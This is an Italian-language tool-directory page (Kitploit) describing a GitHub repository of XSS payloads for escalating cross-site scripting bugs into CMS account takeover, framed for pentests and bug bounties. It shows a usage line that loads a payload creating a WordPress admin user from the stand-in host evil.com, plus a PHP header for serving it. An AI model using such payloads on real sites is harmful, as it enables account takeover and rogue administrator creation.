Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/hakluke/weaponised-xss-payloads
Generazione di PayloadExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingSviluppo Payload
GitHubhakluke/weaponised-xss-payloads

weaponised-XSS-payloads

Payload XSS progettati per trasformare alert(1) in P1

Vedi Repository
1.4k22242 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Payload XSS armati

Payload XSS progettati per trasformare alert(1) in P1.

Il Post del Blog

Questa repo è stata rilasciata insieme a un post del blog intitolato "Come Elevare i Tuoi Bug XSS da Medium a Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

Cos'è questo?

In questo repository troverai una serie di file JavaScript che possono essere caricati in un payload XSS per eseguire funzioni sensibili su piattaforme CMS popolari nel contesto del browser della vittima. Questo può aiutare a concatenare un comune bug XSS in qualcosa di più critico, come il furto dell'account.

Questo è perfetto per aumentare la gravità di un pentest o di un report di bug bounty dimostrando un reale impatto sulla sicurezza.

I payload vengono aggiunti lentamente, man mano che ho tempo. Ce ne sono molti altri in arrivo; se puoi dare una mano, le pull request sono benvenute! Se stai cercando ispirazione su cosa creare, controlla la scheda "issues" di questa repo.

Come Fare

Il modo più semplice per usare questi payload è ospitarli da qualche parte e caricarli nell'attributo src di un tag script per il tuo payload XSS, in questo modo:

root@kitploit:~
<script src="http://evil.com/wordpress_create_admin_user.js"></script>

In alternativa, a seconda del contesto e della lunghezza del payload, a volte può essere , e poi incluso direttamente nella richiesta.

minificato
codificato

Per ospitare il file JavaScript, potresti dover impostare il Content-Type su application/javascript. Per farlo con PHP, puoi semplicemente anteporre questa riga a uno qualsiasi dei payload, salvarlo come file .php e ospitarlo sul tuo server web con PHP abilitato:

root@kitploit:~
<?php header("Content-Type: application/javascript"); ?>

Crediti

Questo articolo di Shift8 è ciò che mi ha ispirato a creare questa repo. Il JS nell'articolo ha un paio di refusi minori, ma i concetti sono azzeccati.

Scarica lo strumento